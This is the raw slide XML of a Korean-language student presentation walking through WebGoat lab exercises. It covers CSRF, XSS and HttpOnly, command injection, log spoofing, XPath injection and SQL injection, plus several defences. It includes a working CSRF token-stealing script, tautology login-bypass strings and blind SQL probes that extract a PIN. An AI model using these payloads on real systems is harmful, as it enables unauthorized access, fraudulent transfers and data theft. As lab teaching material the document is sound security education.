              <a:t> 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var framedoc=document.getElementsByTagName("iframe")[0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>].</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" smtClean="0"/>
              <a:t>contentDocument;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//</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>첫 번째 불러들인 토큰 발급 페이지의 내용을 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>framedoc </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>변수에 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:t>저장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var token=framedoc.form.CSRFToken.value;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> 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//</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>토큰 값을 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>token </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>변수에 저장</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t> 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var Img=new Image();</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> 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//</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>이미지 객체 생성</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t> 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Img.src="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" smtClean="0"/>
              <a:t>://server:8080/WebGoat/attack?Screen=85126574&amp;menu=900&amp;transferFunds=5000&amp;CSRFToken</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>="+token; 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Img.src.width=0; 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Img.src.height=0; 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}&lt;/script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" smtClean="0"/>
          </a:p>
          <a:p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//</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>토큰 발급 및 전송 페이지를 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>iframe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>을 통해 현재 페이지에 로드한 후 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>onload(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>로드가 완료될 때 발생하는 이벤트</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>로 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" smtClean="0"/>
              <a:t>token</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:t>함수 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>호출 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&lt;iframe src="http://192.168.184.130:8080/WebGoat-5.4/attack?Screen=154&amp;menu=900&amp;transferFunds=main</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" smtClean="0"/>
              <a:t>onload=token() </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>width=0 height=0&gt;&lt;/iframe&gt;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128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Http only test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43050" y="174930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HTTP only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설정을 해주면 클라이언트 스크립트를 통해 쿠키에 접근하지 못한다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 (=document.cookie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불가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Set-Cookie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헤더 값으로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HttpOnly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를 추가해주면 된다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33" y="3429000"/>
            <a:ext cx="8567108" cy="210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32833" y="5538158"/>
            <a:ext cx="856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Set-Cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:t>의 헤더값에 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" smtClean="0"/>
              <a:t>HttpOnly</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:t>가 없다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6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543050" y="174930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웹사이트 관리자가 아닌 이가 웹 페이지에 악성 스크립트를 삽입 가능하다는 취약점을 이용하여 쿠키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세션등을 탈취하거나 비정상적인 기능을 수행하게 하는 해킹의 한 종류이다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다른 웹사이트와 정보를 교환하는 식으로 작동하여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XSS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라고 불린다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Stored XSS Attacks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와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 Reflected XSS Attacks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가 있다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XSS(Cross Site Scripting)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Http only test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500" y="1466850"/>
            <a:ext cx="3219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HttpOnly on</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:t>에서 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" smtClean="0"/>
              <a:t>no</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:t>를 선택하여 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" smtClean="0"/>
              <a:t>HttpOnly</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:t>를 활성화 시키지 않았을 경우 쿠키값이 스크립트에 의해 노출된다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture 2" descr="C:\Users\rndlr\AppData\Local\Temp\_AZTMP22_\xss7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6" y="1466850"/>
            <a:ext cx="6217876" cy="485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6" y="1331143"/>
            <a:ext cx="6217876" cy="497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Http only test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16" y="1328468"/>
            <a:ext cx="6288862" cy="486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810500" y="1466850"/>
            <a:ext cx="3219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HTTP only</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:t>가 활성화된 경우 쿠키값이 노출되지 않는다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" smtClean="0"/>
              <a:t>. HTTP only</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:t>를 통해 쿠키값이 노출되지 않는것을 확인했다면 과제에 성공한 것이다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7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543050" y="174930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웹페이지가 사용자에게서 입력받은 데이터에 대해 적절한 인코딩이나  필터링 없이 동적으로 생성된 웹페이지에 포함하여 사용자에게 재전송할 경우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HTTP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요청에 대해 동적으로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HTML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을 생성하는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사용자가 입력 가능할 때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&lt;script&gt;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태그 입력을 사용 가능할 경우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XSS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" b="1" smtClean="0">
                <a:latin typeface="나눔바른고딕" pitchFamily="50" charset="-127"/>
                <a:ea typeface="나눔바른고딕" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>원인</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" b="1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3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543050" y="174930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데이터내에 스크립트 코드가 들어있는지 검증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체크해준다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예를 들어 스크립트 코드의 태그에 사용되는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&lt;,&gt;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기호를 체크하여 무력화 시켜 대응할 수 있다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 </a:t>
            </a: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입력 값이 전달되기 전에 인코딩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혹은 암호화 하고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출력값 암호화 명시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HTTP-only cookies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를 사용하여 클라이언트 측에서 쿠키에 접근하지 못하도록 한다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공격자가 출력값 암호화를 선택하도록 허용하지 않는다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XSS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" b="1" smtClean="0">
                <a:latin typeface="나눔바른고딕" pitchFamily="50" charset="-127"/>
                <a:ea typeface="나눔바른고딕" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>대응 방안</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" b="1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3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543050" y="174930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응용프로그램 보안 상의 허점을 의도적으로 이용해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개발자가 생각지 못한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SQL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문을 실행되게 함으로써 데이터베이스를 비정상적으로 조작하는 공격 방법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코드 인젝션의 한 기법으로 클라이언트의 입력값을 조작하여 서버의 데이터베이스를 공격하는 방법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Injection Attack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OWASP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에서도 수년동안 보안 위협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순위로 분류할 만큼 위험하다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SQL injection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1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Command Injection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파라미터를 사용하는 모든 사이트에 심각한 위협을 줄 수 있다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:t>공격 방법은 배우기 쉽고 시스템 구성요소에 대해 손상을 줄 수 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Paros</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:t>를 통해 값을 중간에 가로 챈 후 추가적으로 입력하고 싶은 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" smtClean="0"/>
              <a:t>OS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:t>명령어를 인코딩하여 입력한 다음 넘겨주면 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" smtClean="0"/>
              <a:t>OS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:t>명령어가 실행되는 것을 볼 수 있다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" smtClean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92" y="1374431"/>
            <a:ext cx="6285206" cy="488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 descr="C:\Users\rndlr\AppData\Local\Temp\_AZTMP24_\inj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46" y="1360594"/>
            <a:ext cx="6293052" cy="49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Log Spoofing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실제로 접근 권한을 얻는 것이 아니라 눈을 속이기 위한 속임수를 구현한다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로그메시지의 형태를 파악하기 위해 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" smtClean="0"/>
              <a:t>Paros</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:t>를 통해 값을 가로채서 형태를 확인한다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과제에서 로그메시지가 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" smtClean="0"/>
              <a:t>&lt;pre&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:t>태그에 묶여있음을 확인할 수 있다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" smtClean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92" y="1374431"/>
            <a:ext cx="6285206" cy="488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 descr="C:\Users\rndlr\AppData\Local\Temp\_AZTMP27_\injection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46" y="1466849"/>
            <a:ext cx="6293051" cy="479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latin typeface="나눔바른고딕" pitchFamily="50" charset="-127"/>
                <a:ea typeface="나눔바른고딕" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>Log Spoofing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5362" name="Picture 2" descr="C:\Users\rndlr\AppData\Local\Temp\_AZTMP25_\injec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92" y="1374431"/>
            <a:ext cx="6285205" cy="488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10500" y="1466850"/>
            <a:ext cx="3219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Paros</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:t>에서 가로챈 값에 직접 입력한 후 전송해주는 방법</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" smtClean="0"/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+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR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User Name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:t>에</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:t>직접 인코딩한 데이터를 추가하여 입력하는 방법</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" smtClean="0"/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mtClean="0"/>
              <a:t>위의 두가지 방법으로 과제를 해결할 수 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9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1" name="Picture 3" descr="C:\Users\rndlr\AppData\Local\Temp\_AZTMP30_\injection3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93" y="1376300"/>
            <a:ext cx="6285204" cy="488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XPATH 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mtClean="0"/>
              <a:t>모든 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" smtClean="0"/>
              <a:t>employees</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:t>의 데이터를 보기 위해 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" smtClean="0"/>
              <a:t>query</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:t>문이 항상 참이 되도록하는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" smtClean="0"/>
              <a:t>‘a’=‘a’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:t>를 추가한다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:t>이때 마지막에 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" smtClean="0"/>
              <a:t>‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:t>는 자동으로 추가되므로 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" smtClean="0"/>
              <a:t>‘a’=‘a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:t>로 해주어야 한다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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mtClean="0"/>
              <a:t>코드를 보면 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" smtClean="0"/>
              <a:t>Password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:t>는 검사하지 않지만 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" smtClean="0"/>
              <a:t>Password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:t>도 동일한 방법으로 항상 참이도록 할 수 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XPATH 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mtClean="0"/>
              <a:t>Submit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:t>을 하게 되면 원하는 모든 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" smtClean="0"/>
              <a:t>employees data</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:t>가 보인다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="18434" name="Picture 2" descr="C:\Users\rndlr\AppData\Local\Temp\_AZTMP31_\inject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93" y="1376301"/>
            <a:ext cx="6147182" cy="4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Phishing with XSS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Picture 2" descr="C:\Users\rndlr\AppData\Local\Temp\_AZTMP1_\xss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5" y="1466850"/>
            <a:ext cx="6502198" cy="45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81950" y="1466850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Serch input field</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:t>에 들어갈 스크립트 문장</a:t>
            </a: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데이터를 전송하는 코드가 정상 작동하지 않아 임의로 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" smtClean="0"/>
              <a:t>Alert</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:t>를 이용하여 화면에 띄어주는 것으로 대체하였습니다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Search</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:t>를 클릭하게 되면 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" smtClean="0"/>
              <a:t>ID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:t>와 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" smtClean="0"/>
              <a:t>PW</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:t>를 입력하는 임의의 입력란이 나타나며 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" smtClean="0"/>
              <a:t>login</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:t>을 클릭하면 데이터가 전송</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:t>출력</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:t>되게 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 descr="C:\Users\rndlr\AppData\Local\Temp\_AZTMP35_\injectio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93" y="1376301"/>
            <a:ext cx="6147182" cy="4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String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0475" y="1466850"/>
            <a:ext cx="3559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mtClean="0"/>
              <a:t>Neville</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:t>의 계정으로 올바른 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" smtClean="0"/>
              <a:t>Password </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:t>없이 로그인 하고자 할 때</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" smtClean="0"/>
              <a:t> Password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:t>가 항상 참이도록 해주면 가능하다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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mtClean="0"/>
              <a:t>Employee_id </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:t>뒤에 항상 참이되는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" smtClean="0"/>
              <a:t>password=1’or‘a’=‘a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:t>를 추가하여 실행해주면 됩니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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0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String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482" name="Picture 2" descr="C:\Users\rndlr\AppData\Local\Temp\_AZTMP37_\injection4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5" y="1328468"/>
            <a:ext cx="9219867" cy="44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7875" y="5779698"/>
            <a:ext cx="921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과제 성공 결과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913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Numeric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1506" name="Picture 2" descr="C:\Users\rndlr\AppData\Local\Temp\_AZTMP39_\injection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04"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1509719" y="1414731"/>
            <a:ext cx="5595629" cy="47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05348" y="1414731"/>
            <a:ext cx="40996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SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:t>을 실행후 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" smtClean="0"/>
              <a:t>resultset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:t>을 가져올때 보통 맨 위의 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" smtClean="0"/>
              <a:t>tuple</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:t>을 가져오는게 보통인데 이러한 취약점을 이용한다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Employee_id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:t>의 파라미터에 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" smtClean="0"/>
              <a:t>or 1=1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:t>을 추가하여 모든 유저의 프로필을 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" smtClean="0"/>
              <a:t>resultset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:t>으로 가져온다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:t>추가적으로 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" smtClean="0"/>
              <a:t>order by salary desc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:t>를 통해 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" smtClean="0"/>
              <a:t>salary</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:t>가 가장 높은 사람이 가장 위로 올라오도록 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Numeric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5348" y="1414731"/>
            <a:ext cx="4099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실행 결과 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" smtClean="0"/>
              <a:t>Larry</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:t>로 들어와서 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" smtClean="0"/>
              <a:t>Larry</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:t>의 프로필을 보도록 실행하였지만 상세 프로필에는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" smtClean="0"/>
              <a:t>Neville</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:t>의 정보가 나와있음을 볼 수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22530" name="Picture 2" descr="C:\Users\rndlr\AppData\Local\Temp\_AZTMP40_\injection5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5" y="1432461"/>
            <a:ext cx="5697473" cy="477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Numeric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6030" y="1605082"/>
            <a:ext cx="2618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Blind SQL Injection </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:t>이기 때문에 참</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:t>거짓으로 문제를 해결해야 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Invalid account number</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:t>가 나왔으므로 해당 질의는 옳다 따라서 나의 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" smtClean="0"/>
              <a:t>Account Number</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:t>는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" smtClean="0"/>
              <a:t>10000</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:t>보다 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>작다는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>것은 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:t>옳지 않다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5" y="5887270"/>
            <a:ext cx="979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101 AND ((select pin from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>pins </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" smtClean="0"/>
              <a:t>where </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>cc_number</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" smtClean="0"/>
              <a:t>=‘1111222233334444')&gt;10000);</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="27650" name="Picture 2" descr="C:\Users\rndlr\AppData\Local\Temp\_AZTMP53_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6" y="1605082"/>
            <a:ext cx="7178154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Numeric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3554" name="Picture 2" descr="C:\Users\rndlr\AppData\Local\Temp\_AZTMP43_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5" y="1605082"/>
            <a:ext cx="7178155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86030" y="1605082"/>
            <a:ext cx="2618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Account number is valid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:t>가 나왔으므로 해당 질의는 옳다 따라서 나의 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" smtClean="0"/>
              <a:t>Account Number</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:t>는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" smtClean="0"/>
              <a:t>10000</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:t>보다 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>작다는 것은 옳다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5" y="5887270"/>
            <a:ext cx="979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101 AND ((select pin from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>pins </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" smtClean="0"/>
              <a:t>where </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>cc_number</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" smtClean="0"/>
              <a:t>=‘1111222233334444')&lt;10000);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Numeric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6030" y="1605082"/>
            <a:ext cx="2618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Account number is valid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:t>가 나왔으므로 해당 질의는 옳다 따라서 나의 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" smtClean="0"/>
              <a:t>Account Number</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:t>는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" smtClean="0"/>
              <a:t>000</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:t>보다 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>작다는 것은 옳다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5" y="5887270"/>
            <a:ext cx="979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101 AND ((select pin from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>pins </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" smtClean="0"/>
              <a:t>where </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>cc_number</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" smtClean="0"/>
              <a:t>=‘1111222233334444')&lt;5000);</a:t>
            </a:r>
